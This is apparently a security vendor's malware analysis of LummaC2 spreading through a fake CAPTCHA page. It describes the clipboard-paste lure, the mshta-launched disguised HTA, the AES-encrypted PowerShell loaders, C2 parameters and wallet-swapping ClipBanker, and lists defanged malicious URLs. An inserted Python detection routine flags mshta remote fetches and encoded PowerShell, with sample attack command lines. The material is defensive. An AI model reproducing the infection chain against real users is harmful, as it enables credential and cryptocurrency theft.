Infostealer LummaC2 Spreading Through Fake CAPTCHA Verification Page

AhnLab SEcurity intelligence Center (ASEC) previously published a blog post introducing the DarkGate malware, which spreads by abusing the clipboard paste function.

In that earlier case, the malware was initially delivered through HTML attachments disguised as MS Word files in phishing emails. More recently, however, LummaC2 has been identified spreading through a fake CAPTCHA verification page.

1. Distribution Channel

When the initial distribution page is accessed, a familiar-looking verification screen is displayed, as shown below. Clicking the “I’m not a robot” button on the page copies a command that connects to a malicious URL to the clipboard.

Figure 1. A fake CAPTCHA verification page

The threat actor presents fake verification steps that instruct users to paste and run the command copied to the clipboard using keyboard shortcuts, tricking them into executing it themselves.

Figure 2. The code that copies a command to the clipboard

2. Obfuscated HTA File

The copied command launches the “mshta.exe” process to fetch and execute a file (web44.mp4) hosted at a malicious URL. The file’s contents have nothing to do with the mp4 extension and are obfuscated, which makes the file hard to recognize as a script. Extracting the file’s strings reveals the script, but that script is obfuscated as well.

Figure 3. (Left: the original web44.mp4 file/Right: A script file revealed through string extraction from web44.mp4)
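As an added defensive illustration (not code from the ASEC post), the following Python checks constructed process-creation records shaped like Sysmon Event ID 1 fields for the pattern described above: mshta.exe given a remote URL whose file extension is not a script type, and PowerShell spawned by mshta with an encoded command. All sample values, including the domain, are constructed.

```python
import re
from urllib.parse import urlparse

# Constructed process-creation records (Sysmon Event ID 1 style fields);
# the domain and paths are placeholders, not indicators from the post.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta https://cdn.example.invalid/web44.mp4"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "powershell -w hidden -ep bypass -e QQBCAEMA"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"mshta C:\Users\alice\installer.hta"},
    {"Image": r"C:\Program Files\App\app.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "app.exe --update"},
]

# Extensions one would normally expect mshta to be handed; anything else
# (mp4, png, ...) is the masquerading pattern seen with web44.mp4.
SCRIPT_EXTS = {".hta", ".htm", ".html", ".js", ".vbs", ".txt", ""}
URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)
ENCODED_RE = re.compile(r"(^|\s)-(e|enc|encodedcommand)\s", re.IGNORECASE)

def classify(event):
    """Return the detection tags that apply to one process-creation record."""
    tags = []
    image = event["Image"].lower()
    parent = event["ParentImage"].lower()
    cmd = event["CommandLine"]
    if image.endswith("\\mshta.exe"):
        for url in URL_RE.findall(cmd):
            tags.append("mshta_remote_url")
            name = urlparse(url).path.rsplit("/", 1)[-1]
            ext = name[name.rfind("."):].lower() if "." in name else ""
            if ext not in SCRIPT_EXTS:
                tags.append("mshta_disguised_extension")
    if parent.endswith("\\mshta.exe") and image.endswith("\\powershell.exe"):
        tags.append("powershell_spawned_by_mshta")
        if ENCODED_RE.search(cmd):
            tags.append("encoded_powershell")
    return tags

def scan(events):
    """Return (index, tags) for every record that triggers at least one tag."""
    hits = []
    for i, event in enumerate(events):
        tags = classify(event)
        if tags:
            hits.append((i, tags))
    return hits
```

Locally launched HTA files (record 2) and ordinary processes (record 3) produce no tags, so the rule keys on the remote fetch and the parent-child chain rather than on mshta.exe alone.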

3. PowerShell Script Loader

The HTA file ultimately executes a PowerShell script. The executed PowerShell script is also encrypted with AES.

Figure 4. AES-decrypted script

Once decrypted, the AES-encrypted PowerShell script downloads and executes an additional PowerShell script (web.png).

Figure 5. The PowerShell script (web.png) executing LummaC2

4. LummaC2

The malware that is ultimately executed is LummaC2, capable of stealing information such as browser data and cryptocurrencies.

Figure 6. LummaC2 communicating with C2

“hwid” is the unique identifier for the infected PC, and a number from 1 to 3 is assigned to “pid” according to the type of information that is stolen. “lid” is presumed to be the Lumma ID and is most likely used as the distributed malware’s campaign identifier. Detailed information about LummaC2 can be found in the blog post below.

In addition, LummaC2 utilizes a module called ClipBanker, which monitors the clipboard and changes copied cryptocurrency wallet addresses to the threat actor’s wallet address.

Figure 7. ClipBanker

5. Conclusion

LummaC2 distributed through fake CAPTCHA pages is mainly spread via crack program download pages or phishing emails. Users should be especially cautious when dealing with emails or websites of unclear origin.

URL

https[:]//cc[.]klipjaqemiu[.]shop/web[.]png
https[:]//klipjaqemiu[.]shop/web44[.]mp4
https[:]//noisercluch[.]click/api
